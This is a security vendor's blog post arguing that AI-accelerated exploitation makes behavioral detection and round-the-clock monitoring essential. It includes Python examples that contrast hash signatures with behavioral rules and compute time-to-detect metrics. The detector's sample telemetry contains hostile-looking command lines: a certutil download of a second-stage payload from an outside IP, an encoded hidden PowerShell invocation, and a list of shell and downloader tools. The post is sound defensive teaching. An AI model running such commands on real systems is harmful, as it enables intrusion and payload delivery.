DEFENSESTORM BLOG

Detection is the control that matters now

Monday, June 29th, 2026



Attack techniques never sit still, and it is no surprise that the attacker's toolkit has changed over the past year. The latest changes, though, should concern us all.

A multi-agent LLM framework called CVE-Genie reproduced 51% of the CVEs published between June 2024 and May 2025 with verified, working exploits, at a median of 18 minutes and an average cost of $2.77 per CVE. The number of AI tools advertised on ransomware forums grew from 38 posts in December 2025 to 1,486 in February 2026. In a very short period the attacker's toolkit became dramatically cheaper, faster, and more automated. AI is changing the economics of vulnerability exploitation.

Most security programs were built on an assumption that no longer holds: that there would be enough time between a vulnerability being disclosed and it being exploited to close the gap with a patch or a compensating control. Median time-to-exploit fell from roughly 700 days in 2020 to 44 days in 2025. Of the vulnerabilities that do get exploited, 28.3% are exploited within 24 hours of public disclosure. A vulnerability management program running on weekly or monthly patch cycles is structurally mismatched to that reality.

What this means for traditional controls 

Preventive controls still matter. Firewalls, network segmentation, patch management, and vulnerability scanning are not obsolete. But signature-based detection tools (antivirus engines, IDS rules, hash blocklists) can only match patterns they already know, and a zero-day has no known signature yet. AI-assisted exploitation makes this limitation cheap to exploit at scale.

IBM's 2026 X-Force Threat Index found that 56% of the vulnerabilities tracked in 2025 required no authentication to exploit, which means anyone who can reach the service can attack it. Attackers aren't defeating the controls. They're walking through a gap the controls don't yet know is there. Vulnerability exploitation was the leading cause of attacks in 2025, accounting for 40% of the incidents X-Force observed.

Edge devices (firewalls, VPN concentrators, routers) are increasingly targeted with zero-days because they hold privileged network positions, generally cannot run an endpoint agent, and have limited behavioral monitoring behind them. The Check Point VPN zero-day exploited this month (CVE-2026-50751), the sixth actively exploited Cisco vulnerability in 2026 alone, and multiple Palo Alto firewall vulnerabilities over the past year all follow this pattern. The products built to protect the perimeter have become preferred entry points.

Rick Howard makes this argument well in Cybersecurity First Principles: the industry has over-invested in controls that assume a stable perimeter and under-invested in the capability to detect and respond when that perimeter fails. AI-accelerated exploitation is making that imbalance visible in real time. 

What actually works 

If signature-based controls can’t stop what they haven’t seen, and if patching can’t keep pace with an exploitation timeline measured in hours, then detection is the control that actually matters. 

The security teams that will protect their institutions over the next few years are the ones that have invested in behavioral detection and 24/7 coverage. Endpoint detection and response (EDR) flags suspicious activity from what a process does (its parent, its command line, the credentials and network connections it touches) rather than from a known file signature, which is what makes it useful against an attack that has no fingerprint yet. For edge devices that cannot run an agent, the equivalent is behavioral monitoring of their logs and of the traffic behind them. An MDR layer brings the around-the-clock coverage that most community banks and credit unions cannot reasonably staff internally. A 24/7 SOC with analysts who can act on what they are seeing is the difference between detecting a compromise in progress and discovering it after the fact.
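To make the signature-versus-behavior distinction concrete, here is a small Python illustration (an added example, not DefenseStorm code or any product's detection logic) that runs a hash blocklist and three behavioral rules over constructed process-creation events. The hostnames, hashes, command lines and rules are all made up for the example. The old payload is caught only by its hash; the novel intrusion chain on the web server, which has no known hash, is caught only by what it does.

```python
"""Signature matching versus behavioral rules over constructed endpoint telemetry.

Added example, not DefenseStorm code. Every event, hash, and rule below is
constructed for illustration; the rule set is deliberately small.
"""
import hashlib
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record of the kind an EDR agent reports."""
    host: str
    user: str
    parent_image: str
    image: str
    cmdline: str
    image_sha256: str


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Signature feed: hashes of payloads seen in past incidents (constructed).
KNOWN_BAD_SHA256 = {sha256_hex(b"loader-seen-last-year")}

# Stand-in hashes for legitimate system binaries (constructed, not real hashes).
LEGIT = {name: sha256_hex(name.encode()) for name in
         ("cmd.exe", "certutil.exe", "powershell.exe", "notepad.exe")}

WEB_SERVERS = {"w3wp.exe", "httpd", "nginx", "tomcat"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "sh", "bash"}
DOWNLOADERS = {"certutil.exe", "bitsadmin.exe", "mshta.exe", "curl", "wget"}


def signature_hit(ev: ProcessEvent) -> bool:
    """Signature detection: fires only if this exact image hash is already known bad."""
    return ev.image_sha256 in KNOWN_BAD_SHA256


def behavioral_findings(ev: ProcessEvent) -> list[str]:
    """Behavioral detection: rules describe what a compromise does, not which file it is.

    Each rule matches a technique that stays the same no matter which
    zero-day delivered it, so a never-seen payload still trips it.
    """
    cmd = ev.cmdline.lower()
    findings = []
    if ev.parent_image in WEB_SERVERS and ev.image in SHELLS:
        findings.append("web server process spawned a shell")
    if ev.image in DOWNLOADERS and ("http://" in cmd or "https://" in cmd):
        findings.append("built-in tool fetching remote content")
    if ev.image in {"powershell.exe", "pwsh.exe"} and " -enc" in cmd:
        findings.append("encoded PowerShell command line")
    return findings


def triage(events: list[ProcessEvent]) -> list[dict]:
    """Run both detection styles over each event and record the verdicts."""
    return [{"host": ev.host, "image": ev.image,
             "signature": signature_hit(ev),
             "behavioral": behavioral_findings(ev)} for ev in events]


def summarize(events: list[ProcessEvent]) -> dict[str, int]:
    """Count how many events each style catches, and how many neither does."""
    rows = triage(events)
    sig = sum(r["signature"] for r in rows)
    beh = sum(bool(r["behavioral"]) for r in rows)
    either = sum(r["signature"] or bool(r["behavioral"]) for r in rows)
    return {"signature": sig, "behavioral": beh, "either": either,
            "clean": len(rows) - either}


# Constructed telemetry: one old, known payload; a novel intrusion chain on a
# web server (no known-bad hashes anywhere in it); one benign event.
SAMPLE_EVENTS = [
    ProcessEvent("ws01", "alice", "explorer.exe", "update_helper.exe",
                 "update_helper.exe /quiet", sha256_hex(b"loader-seen-last-year")),
    ProcessEvent("web01", "IIS APPPOOL\\DefaultAppPool", "w3wp.exe", "cmd.exe",
                 "cmd.exe /c whoami", LEGIT["cmd.exe"]),
    ProcessEvent("web01", "IIS APPPOOL\\DefaultAppPool", "cmd.exe", "certutil.exe",
                 "certutil.exe -urlcache -split -f http://203.0.113.5/stage2.bin stage2.bin",
                 LEGIT["certutil.exe"]),
    ProcessEvent("web01", "IIS APPPOOL\\DefaultAppPool", "cmd.exe", "powershell.exe",
                 "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
                 LEGIT["powershell.exe"]),
    ProcessEvent("ws02", "bob", "explorer.exe", "notepad.exe",
                 "notepad.exe C:\\Users\\bob\\notes.txt", LEGIT["notepad.exe"]),
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
    print(summarize(SAMPLE_EVENTS))
```

Run as-is and the summary comes out as one signature hit, three behavioral hits, four events caught by either method and one clean event. The three behavioral hits are the whole web-server chain, none of which the hash list would ever see. In production the same rules need tuning (some administrative scripts legitimately use encoded PowerShell), which is exactly the analyst work a 24/7 SOC exists to do.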

Where to focus now 

Start with measurement. What is your median time to detection, and at which kill-chain stage are intrusions typically caught? What percentage of monitoring runs around the clock versus business hours only? How much of the detection capability is behavioral versus signature-based? How much of the infrastructure, including the edge devices that cannot run an agent, is actually covered? The goal is behavioral detection at speed across the entire infrastructure.
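One way to get numbers for those questions out of your own incident records, as an added Python example that is not DefenseStorm's tooling: the incident records below are constructed, and the 08:00 to 18:00 weekday staffing window is an assumption to replace with your own SOC schedule. Splitting median time-to-detect by whether the attacker's first action fell inside or outside that window is the quickest proxy for what business-hours-only coverage is costing.

```python
"""Detection metrics over constructed incident records.

Added example, not DefenseStorm code. The incidents are constructed, and the
business-hours window (08:00-18:00, Monday to Friday, local time) is an
assumption; substitute your own SOC schedule.
"""
from dataclasses import dataclass
from datetime import datetime
from statistics import median


@dataclass(frozen=True)
class Incident:
    name: str
    first_activity: datetime   # earliest attacker action established by forensics
    detected_at: datetime      # first alert a person actually acted on
    stage_at_detection: str    # kill-chain stage the intruder had reached by then
    detection_type: str        # "behavioral" or "signature"


BUSINESS_START, BUSINESS_END = 8, 18   # assumption: 08:00-18:00 local, weekdays only


def in_business_hours(t: datetime) -> bool:
    return t.weekday() < 5 and BUSINESS_START <= t.hour < BUSINESS_END


def hours_to_detect(inc: Incident) -> float:
    return (inc.detected_at - inc.first_activity).total_seconds() / 3600


def median_ttd(incidents):
    """Median time to detect in hours (a mean would be dominated by one long-dwell breach)."""
    return median(hours_to_detect(i) for i in incidents) if incidents else None


def ttd_by_window(incidents):
    """Median time to detect split by whether the attacker's first action fell
    inside business hours. A large gap is the fingerprint of business-hours-only monitoring."""
    inside = [i for i in incidents if in_business_hours(i.first_activity)]
    outside = [i for i in incidents if not in_business_hours(i.first_activity)]
    return {"business_hours": median_ttd(inside), "after_hours": median_ttd(outside)}


def behavioral_share(incidents) -> float:
    """Fraction of incidents whose first actionable alert came from a behavioral rule."""
    return sum(i.detection_type == "behavioral" for i in incidents) / len(incidents)


def stage_breakdown(incidents) -> dict[str, int]:
    """How far along the kill chain intrusions were when caught; later stages mean slower detection."""
    counts: dict[str, int] = {}
    for i in incidents:
        counts[i.stage_at_detection] = counts.get(i.stage_at_detection, 0) + 1
    return counts


def report(incidents) -> dict:
    return {"median_hours_to_detect": median_ttd(incidents),
            "by_window": ttd_by_window(incidents),
            "behavioral_share": behavioral_share(incidents),
            "stage_at_detection": stage_breakdown(incidents)}


def parse_dt(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%d %H:%M")


# Constructed records for a SOC staffed 08:00-18:00 on weekdays only.
# Attacks that start Friday night or on a Saturday wait until Monday morning.
SAMPLE_INCIDENTS = [
    Incident("phish-01", parse_dt("2026-06-01 10:00"), parse_dt("2026-06-01 11:00"), "execution", "behavioral"),
    Incident("scan-02", parse_dt("2026-06-02 14:30"), parse_dt("2026-06-02 15:00"), "initial_access", "signature"),
    Incident("vpn-03", parse_dt("2026-06-05 22:00"), parse_dt("2026-06-08 08:00"), "lateral_movement", "behavioral"),
    Incident("edge-04", parse_dt("2026-06-06 03:00"), parse_dt("2026-06-08 09:00"), "persistence", "signature"),
    Incident("macro-05", parse_dt("2026-06-10 19:30"), parse_dt("2026-06-11 08:30"), "execution", "behavioral"),
    Incident("cred-06", parse_dt("2026-06-11 11:00"), parse_dt("2026-06-11 11:30"), "initial_access", "behavioral"),
]

if __name__ == "__main__":
    for key, value in report(SAMPLE_INCIDENTS).items():
        print(f"{key}: {value}")
```

On the constructed data the overall median of seven hours looks tolerable, but the split tells the real story: thirty minutes when the intrusion starts during staffed hours, fifty-four hours when it starts after hours, and the after-hours cases are the ones caught at persistence and lateral movement rather than initial access. Feeding the same functions your own incident timeline gives you the first three answers in the list above; the coverage question has to be answered from an asset inventory, since an incident nobody detected never becomes a record.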

The gaps in those answers point directly to where the investment needs to go. The exploitation timeline has compressed to hours. The banks and credit unions without 24/7 detection coverage are carrying a risk that is growing by the day. 

Sources: 

CVE-Genie (arXiv)
Halcyon ransomware AI tools (CSO Online)
VulnCheck Q1 2025 (The Hacker News)
Flashpoint n-day trends
IBM 2026 X-Force Index
Check Point CVE-2026-50751 (Rapid7)
Cisco SD-WAN zero-days (SecurityWeek)


William Wetherill

Chief Information Security Officer

William is a Certified Information Systems Security Professional (CISSP) and Certified Information Security Manager (CISM) with extensive training, background, and experience in many aspects of IT systems and applications. He has over 27 years of IT experience, almost a third of it directly in cybersecurity. He was previously the Director of Cybersecurity Operations and is now the Chief Information Security Officer at DefenseStorm. Before that he was the Chief Information Security Officer at the University of North Carolina Wilmington (UNCW), where he built and managed its information security program.